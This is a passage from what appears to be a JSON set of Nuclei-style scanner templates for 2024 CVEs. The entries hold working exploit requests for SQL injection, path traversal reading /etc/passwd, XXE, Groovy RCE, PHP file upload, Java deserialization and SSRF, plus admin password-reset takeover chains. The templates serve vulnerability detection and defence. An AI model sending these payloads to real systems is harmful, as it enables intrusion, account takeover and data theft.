ID","Cookie"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7332","info":{"name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_cste/cgi-bin/product.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"[PRODUCT]\",\"[WLAN]\",\"HostName\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-3495","info":{"name":"Wordpress Country State City Dropdown <=2.7.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,(select%20md5({{num}})),0x7c76657273696f6e3a,(select%20md5({{num}})),0x7c757365723a,user()),2,3--+-\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"nonce\":\"(\\S*)\""],"internal":true}]}]},{"id":"CVE-2024-7120","info":{"name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","severity":"medium"},"requests":[{"raw":["GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60  HTTP/1.1\nHost: {{Hostname}}\n","GET /tmp/info.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0337","info":{"name":"Travelpayouts <= 1.1.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?travelpayouts_redirect=https://oast.me"],"redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-31849","info":{"name":"CData Connect < 23.4.8846 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData - Connect"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32238","info":{"name":"H3C ER8300G2-X - Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vtyname","vtypasswd","auxauthmode"],"condition":"and"},{"type":"word","part":"content_type","words":["application/x-unknown"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6396","info":{"name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","severity":"critical"},"requests":[{"raw":["POST /tracking/client_1/get-resource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"resource_type\": \"Repo\",\n\"args\": \"AAAAAAABAAAABw==\"\n}\n","POST /tracking/client_1/read-instruction HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"method_name\": \"_backup_run\",\n\"args\": \"{{base64(args)}}\"\n}\n","@Host: http://{{Host}}:43800\nGET /static-files/{{filename}}.txt HTTP/1.1\nHost: {{Host}}:43800\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"handler\":\"my_resource\"}"]},{"type":"word","part":"body_3","words":["{{filename}}.txt"]},{"type":"word","part":"header_3","words":["text/plain"]}]}]},{"id":"CVE-2024-0250","info":{"name":"Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-32113","info":{"name":"Apache OFBiz Directory Traversal - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["java.lang.Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2876","info":{"name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111\n"],"matchers":[{"type":"dsl","dsl":["duration>=4","status_code == 200","contains(header, \"application/json\")","contains_all(body, \"bulk_action\", \"_sent\", \"errortype\")"],"condition":"and"}]}]},{"id":"CVE-2024-5276","info":{"name":"Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /{{ctxpath}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"jsessionid","regex":["logon.jsp;jsessionid=([A-Z0-9]+)"],"internal":true}]},{"raw":["GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["logonAnonymous.do"],"internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"anonurl","regex":["href=\"(.*)\" class=\"btn btn-outline-primary\" id=\"logonAnonymousLink\""],"internal":true}]},{"raw":["GET {{anonurl}} HTTP/1.1\nHost: {{Hostname}}\n"]},{"raw":["GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1\nHost: {{Hostname}}\n"]},{"raw":["GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"extractors":[{"type":"regex","part":"body","group":1,"name":"fcweb_token","regex":["name=\"FCWEB.FORM.TOKEN\" value=\"([A-Za-z0-9]+)\""],"internal":true},{"type":"regex","part":"body","group":1,"name":"jsessionid2","regex":["logon.jsp;jsessionid=([A-Z0-9]+)"],"internal":true}]},{"raw":["POST /{{ctxpath}}/logon.do HTTP/1.1\nHost: {{Hostname}}\nCookie: JSESSIONID={{jsessionid2}}\nContent-Type: application/x-www-form-urlencoded\n\nFCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&\n"],"disable-cookie":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username/password are not correct","Your session timed out."],"negative":true},{"type":"word","part":"body","words":["<title>FileCatalyst Workflow Administration</title>","{{to_lower(username)}}"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-27718","info":{"name":"Smart s200 Management Platform v.S200 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1071","info":{"name":"WordPress Ultimate Member 2.1.3 - 2.8.2 \u2013 SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains_all(body_2, \"current_page\", \"total_pages\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([0-9a-z]+)\""],"internal":true}]}]},{"id":"CVE-2024-5827","info":{"name":"Vanna - SQL injection","severity":"critical"},"requests":[{"raw":["POST /api/v0/train HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"sql\":\"SELECT pg_read_file('/etc/passwd', 0, 1000);\"}\n"],"matchers":[{"type":"word","words":["id\":"],"internal":true}]},{"raw":["GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2024-45507","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/view/StatsSinceStart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatsDecoratorLocation=http%3a//oast.fun/x%3fb64_body%3d{{urlencode(urlencode(base64(xml)))}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["StatsScreens"]}]}]},{"id":"CVE-2024-8503","info":{"name":"VICIdial - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /vicidial/welcome.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Agent Login\",\"Timeclock\",\"Administration\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32709","info":{"name":"WP-Recall <= 16.26.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3673","info":{"name":"Web Directory Free < 1.7.3 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/web-directory-free\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfrom_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6781","info":{"name":"Calibre <= 7.14.0 Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\"extra_file\", {{book_ids}}, \"../../../../../etc/passwd\", \"\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\"result\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27954","info":{"name":"WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"link\":\"file:"]},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2024-22320","info":{"name":"IBM Operational Decision Manager - Java Deserialization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["javax.servlet.ServletException"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-27956","info":{"name":"WordPress Automatic Plugin <= 3.92.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nq=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/csv\")","contains_all(body, \"DATE\", \"ACTION\", \"KEYWORD\")"],"condition":"and"}]}]},{"id":"CVE-2024-44849","info":{"name":"Qualitor <= 8.24 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"idtipo\"\n\n2\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmdiretoriorede\"\n\n.\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmbucket\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmaccesskey\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"nmkeyid\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"fleArquivo\"; filename=\"{{filename}}.php\"\n\n<?php echo md5({{num}}); ?>\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"cdfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parent.showQAlert(\\'Upload\", \"showQAlert\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1561","info":{"name":"Gradio 4.3-4.12 - Local File Read","severity":"high"},"requests":[{"raw":["POST /component_server HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"component_id\": \"1\", \"data\": \"{{path}}\", \"fn_name\": \"move_resource_to_block_cache\", \"session_hash\": \"aaaaaaaaaaa\"}\n","GET /file={{download_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\"?([^\"]+)"]}],"payloads":{"path":["c:\\\\windows\\\\win.ini","/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3136","info":{"name":"MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stm_lms_load_content&nonce={{nonce}}&\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_2),\"config-create: must have 2 parameters\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["\"load_content\":\"(\\w+?)\""],"group":1,"internal":true,"name":"nonce"}]}]},{"id":"CVE-2024-1210","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"quiz_materials\":","quizzes"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6893","info":{"name":"Journyx - XML External Entities Injection (XXE)","severity":"high"},"requests":[{"raw":["POST /jtcgi/soap_cgi.pyc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///etc/passwd\">]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalid password for user"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8484","info":{"name":"REST API TO MiniProgram <= 4.7.1 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/rest-api-to-miniprogram\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nGET /wp-json/watch-life-net/v1/comment/getcomments?order=DESC,(SELECT(1)FROM(SELECT(SLEEP(6)))a)--&postid=3&limit=1&page=1&page=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body, \"code\",\"success\",\"status\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6922","info":{"name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /v1/proxy/test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"saasUrl\":\"{{interactsh-url}}/?param=one#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"message\":"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2024-45440","info":{"name":"Drupal 11.x-dev - Full Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/core/authorize.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["getHashSalt","RuntimeException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23917","info":{"name":"JetBrains TeamCity > 2023.11.3 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,\"<token name=\\\"{{randstr}}\\\"\")"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","name":"authtoken","internal":true,"group":1,"regex":["value=\"(.+)\""]}]},{"method":"GET","path":["{{BaseURL}}/app/rest/server"],"headers":{"Authorization":"Bearer {{authtoken}}"},"extractors":[{"type":"dsl","dsl":["\"Token:\" + authtoken"]}],"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,'<projects href=')"],"condition":"and"}]}]},{"id":"CVE-2024-1380","info":{"name":"Relevanssi (A Better Search) <= 4.22.0 - Query Log Export","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=&relevanssi_export=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"filename=relevanssi_log.csv\", \"application/download\")","contains_all(body, \"user_id\", \"session_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-1709","info":{"name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SetupWizard.aspx/{{string}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SetupWizardPage","ContentPanel SetupWizard"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","part":"header","kval":["Server"]}]}]},{"id":"CVE-2024-2879","info":{"name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"],"matchers":[{"type":"word","internal":true,"words":[".ls-clearfix:before"]}]},{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"<script>\")"],"condition":"and"}]}]},{"id":"CVE-2024-38514","info":{"name":"NextChat - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["__NEXT_DATA__"]}]}]},{"id":"CVE-2024-5420","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /device/description_en.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\u201c><script>alert(document.domain)</script>\" id=\"standort\"","Host name</label>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6928","info":{"name":"Opti Marketing <= 2.0.9 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/opti-marketing\")"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=save_article&postId=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6205","info":{"name":"PayPlus Payment Gateway < 6.6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","regex('^-1$', body)","contains(content_type,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-20419","info":{"name":"Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover","severity":"critical"},"requests":[{"raw":["GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["enabled","redirect"],"condition":"and","internal":true}]},{"raw":["POST /backend/reset_password/generate_code HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\"}\n"],"matchers":[{"type":"word","words":["uid","auth_token"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"auth_token","json":[".auth_token"],"internal":true}]},{"raw":["POST /backend/reset_password HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\",\"auth_token\":\"{{auth_token}}\", \"password\":\"{{password}}\",\"password_confirmation\":\"{{password}}\",\"common_name\":\"\"}\n"],"matchers":[{"type":"word","words":["\"status\":\"OK\""],"condition":"and","internal":true}]},{"raw":["POST /backend/auth/identity/callback HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["session_key","role"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-4885","info":{"name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /NmAPI/RecurringReport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport\n\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Body><TestRecurringReport xmlns=\"http://tempuri.org/\"><rr xmlns:a=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.RecurringReports.DataContracts\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"><a:AlternateHost i:nil=\"true\"/><a:Disabled>false</a:Disabled><a:EmailSettings xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:Authentication>None</b:Authentication><b:CredentialsId i:nil=\"true\"/><b:DirectoryPath>C:\\PROGRA~2\\Ipswitch\\WhatsUp\\Data\\ScheduledReports</b:DirectoryPath><b:Password/><b:Port>25</b:Port><b:SMTPServer/><b:SendFrom>WhatsUpGold@YourDomain.com</b:SendFrom><b:SendTo i:nil=\"true\"/><b:Subject>Emailing: Wireless Log</b:Subject><b:TimeoutSec>5</b:TimeoutSec><b:UseEncryptedConn>false</b:UseEncryptedConn><b:Username/></a:EmailSettings><a:ExportOptions><a:AuthorName>WhatsUp Gold</a:AuthorName><a:AutosizePDFPage>true</a:AutosizePDFPage><a:AvoidImageBreak>false</a:AvoidImageBreak><a:AvoidTextBreak>true</a:AvoidTextBreak><a:BrowserPageHeight>0</a:BrowserPageHeight><a:BrowserPageWidth>0</a:BrowserPageWidth><a:ConversionDelay>3</a:ConversionDelay><a:CustomPageHeight>0</a:CustomPageHeight><a:CustomPageWidth>0</a:CustomPageWidth><a:ExportAuthToken/><a:ExportType>html</a:ExportType><a:FitHeight>false</a:FitHeight><a:FitWidth>false</a:FitWidth><a:InternalLinksEnabled>false</a:InternalLinksEnabled><a:LiveURLsEnabled>false</a:LiveURLsEnabled><a:NavigationTimeout>240</a:NavigationTimeout><a:PageOrientation>Portrait</a:PageOrientation><a:PageSize>Letter</a:PageSize><a:PdfMessage>html</a:PdfMessage><a:PreviewEnabled>false</a:PreviewEnabled><a:Subject i:nil=\"true\"/><a:TimeFormat>g:i:s a</a:TimeFormat><a:Title i:nil=\"true\"/><a:ToMail>true</a:ToMail><a:WebExportDirectory>C:\\\\Program Files (x86)\\\\Ipswitch\\\\WhatsUp\\\\html\\\\NmConsole\\\\</a:WebExportDirectory><a:ZipEnabled>false</a:ZipEnabled></a:ExportOptions><a:IncludeURLInEmail>false</a:IncludeURLInEmail><a:Name>2e441d4d5a4b258b</a:Name><a:NextRun i:nil=\"true\"/><a:RecurringReportID>-1</a:RecurringReportID><a:Schedule 